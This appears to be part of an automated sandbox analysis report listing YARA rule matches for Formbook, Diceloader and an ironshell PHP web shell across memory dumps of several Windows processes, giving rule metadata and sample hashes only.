Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.4604222907.0000000011264000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: 101 2043 5770 pdf.exe PID: 2720, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: csc.exe PID: 6324, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR Matched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
Source: Process Memory Space: ipconfig.exe PID: 6968, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
